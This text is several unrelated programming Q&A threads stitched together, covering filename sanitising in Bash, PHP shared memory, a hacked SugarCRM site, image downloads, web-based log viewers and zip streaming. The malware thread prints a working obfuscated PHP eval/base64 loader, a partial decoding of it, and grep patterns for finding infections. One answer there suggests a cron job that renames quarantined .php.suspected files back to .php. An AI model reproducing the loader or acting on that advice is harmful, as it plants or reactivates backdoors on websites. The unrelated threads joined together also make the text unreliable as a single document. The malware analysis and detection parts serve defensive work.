I'm attempting to sanitize/filter file names in a Bash script in exactly the same way as the sanitize_file_name function from WordPress. It has to take a filename string and produce a clean version identical to that function's output.
You can see the function in the WordPress developer reference: https://developer.wordpress.org/reference/functions/sanitize_file_name/
GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)
Ubuntu 14.04.5 LTS (GNU/Linux 3.13.0-57-generic x86_64)
This is perl 5, version 18, subversion 2 (v5.18.2) built for x86_64-linux-gnu-thread-multi
Example input file names
These can be, and often are, practically anything you can use as a filename on any operating system, especially Mac and Windows.
This File + Name.mov
Some, Other - File & Name.mov
ANOTHER FILE 2 NAME vs2_.m4v
some & file-name Alpha.m4v
Some Strange & File ++ Name__.mp4
This is a - Weird -# Filename!.mp4
Example output file names
This is what the WordPress sanitize_file_name function produces for the examples above.
This-File-Name.mov
Some-Other-File-Name.mov
ANOTHER-FILE-2-NAME-vs2_.m4v
some-file-name-Alpha.m4v
Some-Strange-File-Name__.mp4
This-is-a-Weird-#-Filename.mp4
It doesn't just have to solve these cases; it has to perform the same transformations that the sanitize_file_name function does, or it will produce duplicate files and they won't be updated on the site.
One thought I've had is that maybe I could somehow use that function itself, but this video encoding server doesn't have PHP on it. It's quite a tiny server that normally just encodes videos and uploads them; it doesn't have much memory, CPU power or disk space (a DigitalOcean 512MB RAM droplet). Maybe I could create a remote PHP script on the web server to handle it over HTTP, but I'm not entirely sure how to do that from Bash either.
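A minimal sketch of what that remote endpoint could look like on the web server (the file name sanitize.php, the wp-load.php path, and the "file" query parameter are placeholders for illustration, not anything WordPress prescribes):

<?php
// sanitize.php: hypothetical endpoint exposing WordPress's
// sanitize_file_name() over HTTP. Bootstrapping WordPress via
// wp-load.php makes the function (and any filters hooked to it)
// available.
require_once __DIR__ . '/wp-load.php';

if (!isset($_GET['file'])) {
    http_response_code(400);
    exit('missing "file" parameter');
}

// Return just the sanitized name as plain text.
header('Content-Type: text/plain; charset=utf-8');
echo sanitize_file_name($_GET['file']);

The Bash side could then call it with something like clean=$(curl -sG --data-urlencode "file=$filename" https://example.com/sanitize.php), which would guarantee the result matches WordPress exactly, since it is WordPress doing the work.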
Even so, this is beyond my limited Bash skills, so I'm wondering if anyone can help or knows of an existing script that does this. I couldn't find one; all I could find were scripts that change spaces or special characters into underscores or dashes, but that isn't all the sanitize_file_name function does.
In case you are curious, the filenames have to be compatible with this WordPress function because of the way this website is set up to handle videos. It allows people to upload videos through WordPress, which are then sent to a separate video server for encoding and on to Amazon S3 and CloudFront for serving on the site. It also allows adding videos through Dropbox using the External Media plugin (which currently duplicates the video upload because of the Dropbox sync, but that's another minor issue). The video server also syncs with a Dropbox account, whitelists the folders in it, and runs this Bash script, which watches a VideoServer Dropbox folder using inotifywait and copies videos from it to another folder temporarily, where the video encoder processes them. This way, when they update the videos in their Dropbox, the video shown on the site is automatically re-encoded and updated. They could just upload the files through WordPress, but they don't seem to want to, or don't know how, for some reason.
If you have Perl installed, try with:
#!/bin/bash
# Strip the special characters WordPress removes, then collapse runs of
# whitespace and dashes into a single dash.
function sanitize_file_name {
  echo -n "$1" | perl -pe 's/[\?\[\]\/\\=<>:;,"&\$#*()|~`!{}%+]//g; s/[\r\n\t -]+/-/g;'
}
filename="Wh00t? it's a -- re#lly-weird {file&name} (with + Plus and__1% #of# [\$qRots\$!]).mov"
cleaned=$(sanitize_file_name "$filename")
echo original : "$filename"
echo sanitised: "$cleaned"
Result is:
original : Wh00t? it's a -- re#lly-weird {file&name} (with + Plus and__1% #of# [$qRots$!]).mov
sanitised: Wh00t-it's-a-re#lly-weird-filename-with-Plus-and__1-of-qRots.mov
Looking at the WP function, this emulates it quite well.
Inspired by the answer above:
EscapeFilename()
{
    # "$*" joins all the arguments; the original "$#" was a bug, since $#
    # expands to the argument count, not the arguments themselves.
    printf '%s' "$*" | perl -pe 's/[:;,\?\[\]\/\\=<>"&\$#*()|~`!{}%+]//g; s/[\s-]+/-/g;';
}
I've been all over the internet looking for an answer to my problem. Here is the setup: I am running embedded Linux (created with Yocto), which runs the Lighttpd web server with PHP5. In my C++ code I have the following:
shared = shm_open(SHARED_FILE_NAME, O_RDWR | O_CREAT | O_TRUNC, 0666);
ftruncate(shared, FILE_SIZE);
map = mmap(...);
// shm_unlink() isn't called until my C++ thread ends.
Everything works well, I do not get any errors, and other C++ processes and threads are also able to access the shared memory and map it without any problems (I have one writer thread, and all other threads and processes only read the memory). The memory is used as a ring buffer, where the writing thread updates data very quickly. The problems start when trying to access that same memory in PHP. In PHP I do (I only need read access):
<?php
$shm_key = ftok("/dev/shm/shared_file.shm", 'c');
$shm_id = shmop_open($shm_key, "a", 0, 0);
...
?>
The value returned by ftok() is not -1, which means it did not fail. However, PHP's shmop_open() call fails with:
Warning: shmop_open(): unable to attach or create shared memory segment in /www/pages/shared.php on line 9
I've changed the permissions of the file with chmod 777 /dev/shm/shared.shm just to rule out any file permission issues. Also, when I run ipcs -m I do not get any listings for shared memory segments, yet my C++ code is running just fine. I've also looked for SELinux and tried entering setenforce 0, but I get -sh: setenforce: command not found, so I figure this isn't the issue. I've also tried running wget <local ip address>/shared.php to see if running locally would return the correct data, but the file which was returned had the same error message.
I am looking to be able to have a web page on my embedded system read this shared memory and stream back chunks of binary to feed a graph when a request comes in (not interested in web sockets at the time). I am able to get named pipes to work across PHP and C++ just fine but I need shared memory for this application and the shared memory access seems to be troublesome. Any help is appreciated.
I'm developing PHP functions that need to use C shared memory. Like your code, my C functions use shm_open, mmap, etc., and I tried to use PHP's ftok() and shmop_open() to access the C shared memory, but these PHP functions don't work.
The two areas are not compatible. I found the different properties of the two mechanisms described in this document: http://menehune.opt.wfu.edu/Kokua/More_SGI/007-2478-008/sgi_html/ch03.html
C (with shm_open, mmap, like the Straton source code) uses "POSIX Shared Memory"
PHP (with the shmop_* functions) uses "System V Shared Memory"
I suggest you try Sync (http://php.net/manual/en/book.sync.php); you need the PECL sync extension.
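Alternatively, since Linux exposes POSIX shared-memory objects as tmpfs-backed files under /dev/shm, you may be able to sidestep the System V APIs entirely and read the object as a plain file from PHP. A minimal sketch, assuming the path from the question and ignoring locking (with a fast writer, a read can see a torn update):

<?php
// Read a POSIX shared-memory object directly: on Linux it is just a
// file under /dev/shm, so no shmop_* calls are needed.
$path = '/dev/shm/shared_file.shm';

$fp = fopen($path, 'rb');
if ($fp === false) {
    exit("cannot open $path");
}

// Read however much of the ring buffer you need; the offsets and
// layout must match the C writer's struct definitions (assumed here).
$data = fread($fp, 4096);
fclose($fp);

// Unpack fields according to the C side's layout, e.g.:
// $header = unpack('Vhead/Vtail', $data);
echo strlen($data), " bytes read\n";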
For the last 4 days, we have been facing a strange issue on our production server (an AWS EC2 instance), specific to only one site, which is a SugarCRM site.
The issue is that the file /home/site_folder/public_html/include/MassUpdate.php is automatically renamed to /home/site_folder/public_html/include/MassUpdate.php.suspected
This happens 2-3 times a day, with a gap of 3-4 hours. It occurs only on this specific site; it doesn't even occur on the staging replica of the same site. I compared the code of that file from both sites, and it's the same.
We Googled and found that this issue occurs mostly on WordPress sites and could be the result of an attack. But we checked our server for signs of an attack and there aren't any. There is also no virus/malware scan running on the server.
What should we do?
Update:
We found a few things after going through this link.
We executed egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/ and found a few files containing the following sample code:
<?php
function flnftovr($hkbfqecms, $bezzmczom) {
    $ggy = '';
    for ($i = 0; $i < strlen($hkbfqecms); $i++) {
        $ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];
    }
    $ixo = "base64_decode";
    return $ixo($ggy);
}
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
eval(flnftovr($s, $koicev));?>
It seems to be some malware. How do we go about removing it permanently?
Thanks
The renaming of .php files to .php.suspected keeps happening today. The following commands should come up empty on a clean installation:
find <web site root> -name '*.suspected' -print
find <web site root> -name '.*.ico' -print
In my case, the infected files could be located with the following commands:
cd <web site root>
egrep -Rl '\$GLOBALS.*\\x'
egrep -Rl -Ezo '/\*(\w+)\*/\s*#include\s*[^;]+;\s*/\*'
egrep -Rl -E '^.+(\$_COOKIE|\$_POST).+eval.+$'
I have prepared a longer description of the problem and how to deal with it at GitHub.
It's somewhat obfuscated, but I've de-obfuscated it. The function flnftovr takes a string and an array as arguments. It creates a new string $ggy using the formula
isset($array[$string[$i]]) ? $array[$string[$i]] : $string[$i];}
It then prepends base64_decode to the string.
The string is $s, the array is $koicev. It then evals the result of this manipulation. So eventually a string gets created:
base64_decode('QGluaV9zZXQoJ2Vycm9yX2xvZycsIE5VTEwpOwpAaW5pX3NldCgnbG9nX2Vycm9ycycsIDApOwpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgMCk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmlmKGlzc2V0KCRfU0VSVkVSKfZW5jb2RlKHNlcmlhbGl6ZSgkcmVzKSk7Cn0=')
So what actually gets run on your server is:
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
if(isset($_SERVER)
encode(serialize($res));
}
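If you want to inspect a payload like this yourself without running it, a common trick is to reuse the malware's own decoder but print the result instead of eval()'ing it. A sketch, with the obfuscated string and substitution map left as placeholders to paste in from the infected file:

<?php
// De-obfuscate without executing: this is the same substitution loop
// as the malware's flnftovr(), but the decoded source is echoed
// rather than passed to eval().
function decode($s, $map) {
    $out = '';
    for ($i = 0; $i < strlen($s); $i++) {
        $out .= isset($map[$s[$i]]) ? $map[$s[$i]] : $s[$i];
    }
    return base64_decode($out);
}

$s = '...';        // paste the obfuscated $s from the infected file
$koicev = array(); // paste the $koicev substitution map

echo decode($s, $koicev); // prints the hidden PHP source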
If you didn't create this and you suspect your site has been hacked, I'd suggest you wipe the server, and create a new installation of whatever apps are running on your server.
Renaming .php files to .php.suspected is usually intentional, done by the hacker's script. The extension is changed to give the impression that the file was checked by some antimalware software, found secure, and can't be executed. But, in fact, it isn't secure. The script changes the extension back to "php" anytime it wants to invoke the file, and afterwards changes it back to "suspected".
You can read about it at Sucuri Research Labs.
This post may be old, but the topic is still alive, especially given the June 2019 malware campaign targeting WordPress plugins. I found a few "suspected" files in my client's WordPress subdirectories (e.g. wp-content).
Posting this answer as it may help others.
Create a file with a '.sh' extension at a convenient location.
Add the following code to it:
#!/bin/bash
# Rename your_file_name.php.suspected back to your_file_name.php
mv /<path_to_your_file>/your_file_name.php.suspected /<path_to_your_file>/your_file_name.php
Save this file.
Set a cron job to run every 10 minutes (or whatever interval you need) by adding the following line to your crontab:
*/10 * * * * path_to_cron_file.sh
Restart the cron service.
You will find plenty of documentation about creating cron jobs on Google.
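If there are many affected files, hard-coding each mv gets tedious. Here is a sketch of a PHP CLI script you could call from the same cron job instead; the document-root path is an assumption:

<?php
// Rename every *.php.suspected file under $root back to *.php.
$root = '/home/site_folder/public_html'; // adjust to your site

$iterator = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
);

foreach ($iterator as $file) {
    $path = $file->getPathname();
    if (substr($path, -14) === '.php.suspected') {
        $target = substr($path, 0, -10); // drop the ".suspected" suffix
        rename($path, $target);
        echo "renamed: $path -> $target\n";
    }
}

Keep in mind this only treats the symptom; as the other answers note, the renaming will keep happening until the underlying infection is removed.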
I'm having trouble capturing the following dynamic image to disk; all I get is a 1K file:
http://water.weather.gov/precip/save.php?timetype=RECENT&loctype=NWS&units=engl&timeframe=current&product=observed&loc=regionER
I have set up PHP cURL and it works just fine on static imagery, but it does not work for the above link. Similarly, the copy function and file_put_contents/file_get_contents also work fine for a static image. There are plenty of references on SO for the usage of these PHP functions, so I will not get into details here. Just the copy command:
copy('http://water.weather.gov/precip/save.php?timetype=RECENT&loctype=NWS&units=engl&timeframe=current&product=observed&loc=regionER', 'precip5.png');
The behavior is the same, a 760-byte precip5.png, on both my Windows development box and my Linux staging box, so I can rule out OS issues. Again, all the PHP functions do exactly the same thing: they generate a file, but an empty one. The command-line curl program also generates that same junk 1K file.
So the issue seems to be the source, and the best I can tell is that it is a dynamic (streaming?) image.
Ideally, I would like this to be done in PHP or with some command-line utility like curl. I am trying to avoid adding a Java (ImageIO) dependency just for this... until I absolutely have to go there...
I am trying to understand the nature of the beast (the image) first ;-)...
The URL you are saving produces HTML output, not the image. You are missing the parameter &print=1:
http://water.weather.gov/precip/save.php?timetype=RECENT&loctype=NWS&units=engl&timeframe=current&product=observed&loc=regionER&print=1
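With that parameter added, the copy() call from the question should work as-is. A quick sketch with a failure check:

<?php
// Fetch the rendered image (not the HTML page) by appending &print=1.
$url = 'http://water.weather.gov/precip/save.php?timetype=RECENT&loctype=NWS'
     . '&units=engl&timeframe=current&product=observed&loc=regionER&print=1';

if (!copy($url, 'precip5.png')) {
    exit('download failed');
}

// The bad HTML response was under 1 KB; a real image should be larger.
echo 'saved ', filesize('precip5.png'), " bytes\n";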
Is there a way to view the PHP error logs or Apache error logs in a web browser?
I find it inconvenient to ssh into multiple servers and run a "tail" command to follow the error logs. Is there some tool (preferably open source) that shows me the error logs online (streaming or non-streaming)?
Thanks
A simple PHP script to read the log and print it:
<?php
// Show the most recent entries from the Apache error log.
exec('tail /var/log/apache2/error.log', $error_logs);
foreach ($error_logs as $error_log) {
    // Escape each line so raw log content can't inject HTML.
    echo "<br />" . htmlspecialchars($error_log);
}
?>
You can embed this in your HTML as per your requirement. The best part is that tail only loads the latest errors, which won't put too much load on your server.
You can change the tail invocation to give the output you want.
Ex. tail myfile.txt -n 100 // it will give the last 100 lines
See "What commercial and open source competitors are there to Splunk?", and I would recommend https://github.com/tobi/clarity
Simple and easy tool.
Since everyone is suggesting clarity, I would also like to mention tailon. I wrote tailon as a more modern and secure alternative to clarity. It's still in its early stages of development, but the functionality you need is there. You may also use wtee, if you're only interested in following a single log file.
You could make a script that reads the error logs from Apache2:
$apache_errorlog = file_get_contents('/var/log/apache2/error.log');
If that's not working, try to get it with the PHP functions exec or shell_exec and the command 'cat /var/log/apache2/error.log'.
EDIT: If you have multiple servers (I guess with web servers on them), you can create a file on each machine; when you make a request to that script (over a hashed connection), you get the logs from that server.
I recommend LogHappens: https://loghappens.com. It allows you to view the error log in a web browser.
LogHappens supports various web server log formats; it comes with parsers for Apache and CakePHP, and you can write your own.
You can find it here: https://github.com/qijianjun/logHappens
It's open source and free. I forked it and did some work to make it work better in a dev or public environment, namely:
Support for a security token: one can't access the site without the token set in config.php
Support for IP whitelists, for security and privacy
Support for configuring the interval between AJAX requests
Support for loading static files locally (for a local dev environment)
I've found this solution: https://code.google.com/p/php-tail/
It's working perfectly. I only needed to change the file size check, because I was getting an error at first:
56 if($maxLength > $this->maxSizeToLoad) {
57 $maxLength = $this->maxSizeToLoad;
58 // return json_encode(array("size" => $fsize, "data" => array("ERROR: PHPTail attempted to load more (".round(($maxLength / 1048576), 2)."MB) then the maximum size (".round(($this->maxSizeToLoad / 1048576), 2) ."MB) of bytes into memory. You should lower the defaultUpdateTime to prevent this from happening. ")));
59 }
And I've added a default size, but it's not needed:
125 lastSize = <?php echo filesize($this->log) ?: 1000; ?>;
I know this question is a bit old, but (along with the lack of good choices) it gave me the idea to create this tiny (open source) web app: https://github.com/ToX82/logHappens. It can be used online, but I'd use an .htpasswd file as a basic login system. I hope it helps.
I'm trying to put together a zip streaming solution using Unix's zip command and PHP's passthru function, but I've hit a snag.
The script looks something like this:
<?php
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachement; filename=myfile.zip");
passthru("zip -r -0 - /stuff/to/zip/");
exit();
?>
The zip command works OK and the output is received by the browser and saved as a zip file.
The zip can then be extracted fine on Windows and Unix, but on Mac OS X the built-in extractor (BOMArchiveHelper) can't extract the file. Other applications on OS X work fine though.
The error given by BOMArchiveHelper is the same one it gives when a zip is password protected (which it doesn't handle). A zip analyzer program indicated that some of the files in the archive were flagged as password protected.
As I said though, apparently no other extraction application pays attention to that.
When examining the zip more closely, I found that the one generated by the PHP script is a few bytes larger than one generated directly by the zip command on the server.
It seems that the streaming process with passthru adds something to the file that probably causes the problems with BOMArchiveHelper.
To test this, I used passthru to stream a zip I had already created on the server: passthru("cat stuff.zip")
That worked fine with BOMArchiveHelper.
So the problem seems to lie somewhere in the process where the passthru function takes the binary data generated on the fly by the zip command and passes that to the browser.
I've tried to eliminate all the sources where the extra bytes could be generated (setting zip command to quiet and so on), but the added data still remains.
A binary diff of the streamed zip and a pre-generated zip shows that the extra data is scattered all over the file, not just at the end or the beginning.
Anyone have a clue, or seen this problem before and decided it's impossible to solve?
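One thing worth ruling out: PHP's own output buffering or zlib.output_compression can inject or rewrite bytes in the middle of a binary stream. A sketch of the same script with buffers cleared first; this is an assumption about the cause, not a confirmed fix:

<?php
// Make sure PHP is not compressing or buffering the binary stream.
@ini_set('zlib.output_compression', 'Off');
while (ob_get_level() > 0) {
    ob_end_clean(); // discard any open output buffers
}

header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=myfile.zip");

// -q keeps zip's diagnostics quiet while the archive itself is
// written to stdout.
passthru("zip -q -r -0 - /stuff/to/zip/");
exit();
?>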
NB: Someone else had already encountered and very well described this issue before me, without getting any answer, so I copied/pasted his message here and confirmed that all of his tests do indeed fail for me as well, and none of my own attempts passed...
Apparently the only way to get this to work would be to ask people to use either unzip or StuffIt Expander...
If you are using nginx then take a look at http://wiki.nginx.org/NginxNgxZip